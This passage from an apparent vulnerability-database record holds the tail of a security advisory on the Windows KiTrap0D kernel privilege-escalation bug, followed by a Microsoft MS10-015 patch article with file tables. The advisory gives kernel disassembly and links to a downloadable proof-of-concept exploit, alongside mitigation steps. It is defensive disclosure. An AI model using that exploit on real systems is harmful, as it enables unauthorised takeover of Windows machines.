saved\r\n(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition\r\ndescribed above.\r\n\r\n/* ... */\r\n.text:0043C3CE Ki386BiosCallReturnAddress proc near\r\n.text:0043C3CE mov eax, large fs:KPCR.SelfPcr\r\n.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3D7 mov edi, [edi]\r\n.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]\r\n.text:0043C3DC mov ecx, 84h\r\n.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi\r\n.text:0043C3E4 rep movsd\r\n.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3E9 add esp, 4\r\n.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]\r\n.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi\r\n.text:0043C3F5 mov eax, [eax+KPCR.TSS]\r\n.text:0043C3F8 sub edi, 220h\r\n.text:0043C3FE mov [eax+KTSS.Esp0], edi\r\n.text:0043C401 pop edx\r\n.text:0043C402 mov [ecx+KTHREAD.Teb], edx\r\n.text:0043C405 pop edx\r\n.text:0043C406 mov large fs:KPCR.NtTib.Self, edx\r\n.text:0043C40D mov ebx, large fs:KPCR.GDT\r\n.text:0043C414 mov [ebx+3Ah], dx\r\n.text:0043C418 shr edx, 10h\r\n.text:0043C41B mov byte ptr [ebx+3Ch], dl\r\n.text:0043C41E mov [ebx+3Fh], dh\r\n.text:0043C421 sti\r\n.text:0043C422 pop edi\r\n.text:0043C423 pop esi\r\n.text:0043C424 pop ebx\r\n.text:0043C425 pop ebp\r\n.text:0043C426 retn 4\r\n/* ... */\r\n\r\nPossibly naive example code for triggering this condition is available from the\r\nlink below.\r\n\r\nhttp://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip\r\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip)\r\n\r\nThe code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista\r\nand Windows 7. Support for other affected operating systems is left as an\r\nexercise for the interested reader.\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIf you believe you may be affected, you should consider applying the workaround\r\ndescribed below.\r\n\r\nTemporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack\r\nfrom functioning, as without a process with VdmAllowed, it is not possible to\r\naccess NtVdmControl() (without SeTcbPrivilege, of course).\r\n\r\nThe policy template \"Windows Components\\Application Compatibility\\Prevent\r\naccess to 16-bit applications\" may be used within the group policy editor to\r\nprevent unprivileged users from executing 16-bit applications. I'm informed\r\nthis is an officially supported machine configuration.\r\n\r\nAdministrators unfamiliar with group policy may find the videos below\r\ninstructive. Further information is available from the Windows Server\r\nGroup Policy Home\r\n\r\nhttp://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.\r\n\r\nTo watch a demonstration of this policy being applied to a Windows Server 2003\r\ndomain controller, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=XRVI4iQ2Nug\r\n\r\nTo watch a demonstration of this policy being applied to a Windows Server 2008\r\ndomain controller, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=u8pfXW7crEQ\r\n\r\nTo watch a demonstration of this policy being applied to a shared but\r\nunjoined Windows XP Professional machine, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=u7Y6d-BVwxk\r\n\r\nOn Windows NT4, the following knowledgebase article explains how to disable the\r\nNTVDM and WOWEXEC subsystems.\r\n\r\nhttp://support.microsoft.com/kb/220159\r\n\r\nApplying these configuration changes will temporarily prevent users from\r\naccessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users\r\nrequire this functionality.\r\n\r\nIf you do not require this feature and depend on NT security, consider\r\npermanently disabling it in order to reduce kernel attack surface.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMicrosoft was informed about this vulnerability on 12-Jun-2009, and they\r\nconfirmed receipt of my report on 22-Jun-2009.\r\n\r\nRegrettably, no official patch is currently available. As an effective and easy\r\nto deploy workaround is available, I have concluded that it is in the best\r\ninterest of users to go ahead with the publication of this document without an\r\nofficial patch. It should be noted that very few users rely on NT security, the\r\nprimary audience of this advisory is expected to be domain administrators and\r\nsecurity professionals.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,\r\nScaryBeasts, spender and all my other elite colleagues.\r\n\r\nCheck out some photography while at ring0 http://flickr.com/meder.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\nDerek Soeder has previously reported some legendary NT bugs, including multiple\r\nvdm bugs that, while unrelated to this issue, make fascinating reading.\r\n\r\n- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege Escalation\r\n- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege Escalation\r\n- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition Privilege Escalation\r\n\r\n-------------------\r\nAppendix\r\n-----------------------\r\n\r\nSHA-1 checksum of KiTrap0D.zip follows.\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n99a047427e9085d52aaddfc9214fd1a621534072 KiTrap0D.zip\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 (GNU/Linux)\r\n\r\niQEVAwUBS1W6+RvyfE4zaHEXAQK//QgAvo/VhPdeASGe7SSfC3jLwNzsfVfM+FMo\r\nx7JZMMfVUh6b/+FxvokIpsCUf7QQkv+YcyCiatutVjUok5aw5BirFtPLHORIIKPX\r\nB5gN2a4G8RIXh5yKE6FffKGQsPJNW1Ua5Jss8rf59TEj3EDky1vco+WVmmz7TsHn\r\nTQdUreVcL8wFmCAgq5X0AKrdepYDBmYLF0AUFOdG3mKJ43dnP59p9R7+ckv0pfLW\r\nXtvOgzZDNMew4z2Z53YQpE7dO+Y3H3rnhLN7jF7i9We9iiG4ATDke8byFAIDZQZx\r\nucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg==\r\n=LHU0\r\n-----END PGP SIGNATURE-----\r\n\r\n-- \r\n-------------------------------------\r\ntavisosdf.lonestar.org | finger me for my gpg key.\r\n------------------------------------------------------- ", "sourceHref": "https://www.exploit-db.com/download/11199", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:40:12", "description": "<html><body>Resolves vulnerabilities in Windows that could allow elevation of privilege if an attacker logged on to the system and then ran a specially crafted application.<h2></h2><div class=\"kb-notice-section section\">Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you're running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: <a href=\"http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs\" id=\"kb-link-1\" target=\"_self\">Support is ending for some versions of Windows</a>.</div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-015. To view the complete security bulletin, visit one of the following Microsoft Web sites: <ul class=\"sbody-free_list\"><li>Home users: <div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/201002.aspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/201002.aspx</a></div>Skip the details: Download the updates for your home computer or laptop from the Microsoft Update Web site now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-3\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals: <div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx\" id=\"kb-link-4\" target=\"_self\">http://ww w.microsoft.com/technet/security/bulletin/MS10-015.mspx</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-5\" target=\"_self\">Support for Microsoft Update</a> Security solutions for IT professionals: <a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-6\" target=\"_self\">TechNet Security Troubleshooting and Support</a> Help protect your computer that is running Windows from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-7\" target=\"_self\">Virus Solution and Security Center</a> Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-8\" target=\"_self\">International Support</a> </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3><ul class=\"sbody-free_list\"><li>After you install this update on a 32-bit version of Microsoft Windows, you may receive a Stop error message on a blue screen that causes the computer to restart repeatedly. This problem may be caused by a conflict between the security update and malware that is resident on the system. This problem is not a quality issue with the security update, and the issue is not specific to any OEM. If you are running a 64-bit version of Windows, or if you are using enterprise deployment systems such as SMS or Microsoft Windows Server Update Services (WSUS) server, you will be offered, and can deploy the MS10-015 package. Customers who have successfully tested the MS10-015 update should not delay deployment of this security update because of concerns about the quality of the update. We have created a Fix it solution that can determine whether a computer is compatible with this security update. For more information, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/980966\" id=\"kb-link-9\">980966 </a> How to determine whether a computer is compatible with security update 977165 </div> Customers who experience issues installing Microsoft security updates can visit the following Microsoft Web page for assistance: <div class=\"indent\"><a href=\"https://consumersecuritysupport.microsoft.com\" id=\"kb-link-10\" target=\"_self\">https://consumersecuritysupport.microsoft.com</a></div>Customers in the United States can contact Customer Service and Support at no charge by using the PC Safety hotline at 1-866-727-2338 (PCSAFETY). Customers outside the United States can visit the following Microsoft Web page to find local contact numbers: <div class=\"indent\"><a href=\"https://support.microsoft.com/international\" id=\"kb-link-11\" target=\"_self\">http://support.microsoft.com/international</a></div>Customers who suspect their systems may have the malware should contact their antivirus (AV) vendor. </li><li>On certain Windows XP-based systems, this security update may be reoffered. This problem occurs because certain binaries are in a \"Not Signed\" state. To resolve this issue, follow the steps in the \"Method 3: Rename the Catroot2 folder\" section of the following article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/822798\" id=\"kb-link-12\">822798 </a> You cannot install some updates or programs </div></li><li>After you install this security update on a Windows Server 2003-based system, the security update may be incorrectly listed in the Add or Remove Programs item in Control Panel as \"Update\" for Windows Server 2003 (KB977165) instead of as \"Security Update\" for Windows Server 2003 (KB977165). However, after you the install update, the system is secured against the attacks that are described in security bulletin MS10-015.</li></ul></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\"><a class=\"bookmark\" id=\"fileinfo\"></a>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files. <h3 class=\"sbody-h3\">Windows 2000 file information</h3><h4 class=\"sbody-h4\">For all supported editions of Microsoft Windows 2000 Service Pack 4</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mup.sys</td><td class=\"sbody-td\">5.0.2195.7006</td><td class=\"sbody-td\">89,328</td><td class=\"sbody-td\">02-Dec-2004</td><td class=\"sbody-td\">13:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.0.2195.7364</td><td class=\"sbody-td\">1,714,560</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">5.0.2195.7364</td><td class=\"sbody-td\">1,713,600</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrpamp.exe</td><td class=\"sbody-td\">5.0.2195.7364</td><td class=\"sbody-td\">1,735,872</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.0.2195.7364</td><td class=\"sbody-td\">1,690,944</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:52</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Windows XP and Windows Server 2003 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific milestone (RTM, SPn) and service branch (QFE, GDR) are noted in the \"SP requirement\" and \"Service branch\" columns.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes.</li><li>In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KBnumber.cat) that is signed with a Microsoft digital signature.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,136,064</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:53</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,057,728</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrpamp.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,015,744</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:19</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,180,352</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:55</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,142,720</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:11</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,063,104</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrpamp.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,020,864</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.1.2600.3654</td><td class=\"sbody-td\">2,185,984</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:14</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,145,280</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">19:26</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,066,048</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:43</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrpamp.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,023,936</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:43</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,189,184</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">19:27</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,145,280</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">18:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,066,176</td><td class=\"sbody-td\">09-Dec-2009</td><td class=\"sbody-td\">07:10</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrpamp.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,023,936</td><td class=\"sbody-td\">08-Dec-2009</td><td class=\"sbody-td\">17:40</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.1.2600.5913</td><td class=\"sbody-td\">2,189,312</td><td class=\"sbody-td\">09-Dec-2009</td><td class=\"sbody-td\">07:52</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">4,588,032</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">18:50</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">4,518,912</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">18:51</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Hal.dll</td><td class=\"sbody-td\">5.2.3790.4354</td><td class=\"sbody-td\">280,064</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">18:47</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">4,613,632</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">18:47</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">4,540,416</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">18:47</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,488,832</td><td class=\"sbody-td\">15-Dec-2009</td><td class=\"sbody-td\">17:23</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,300,928</td><td class=\"sbody-td\">15-Dec-2009</td><td class=\"sbody-td\">15:54</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrpamp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,340,352</td><td class=\"sbody-td\">15-Dec-2009</td><td class=\"sbody-td\">15:54</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,449,408</td><td class=\"sbody-td\">15-Dec-2009</td><td class=\"sbody-td\">17:22</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,499,584</td><td class=\"sbody-td\">15-Dec-2009</td><td class=\"sbody-td\">16:06</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlpa.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,310,656</td><td class=\"sbody-td\">15-Dec-2009</td><td class=\"sbody-td\">15:05</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrpamp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,351,104</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">18:42</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntoskrnl.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">2,459,136</td><td class=\"sbody-td\">15-Dec-2009</td><td class=\"sbody-td\">16:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">6,554,112</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">19:08</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntdll.dll</td><td class=\"sbody-td\">5.2.3790.4455</td><td class=\"sbody-td\">1,646,592</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">19:04</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ntkrnlmp.exe</td><td class=\"sbody-td\">5.2.3790.4637</td><td class=\"sbody-td\">6,581,248</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">19:04</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wntdll.dll</td><td class=\"sbody-td\">5.2.3790.4455</td><td class=\"sbody-td\">775,168</td><td class=\"sbody-td\">16-Dec-2009</td><td class=\"sbody-td\">19:04</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h3 class=\"sbody-h3\">Windows Vista and Windows Server 2008 file information</h3><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SPn), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table: <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">Version</td><td class=\"sbody-td\">Product</td><td class=\"sbody-td\">Milestone</td><td class=\"sbody-td\">Service branch</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6000.16xxx</td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6000.20xxx</td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6001.18xxx</td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6001.22xxx</td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6002.18xxx</td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.6002.22xxx</td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>Service Pack 1 is integrated into the release version of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000. xxxxxx version number.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are 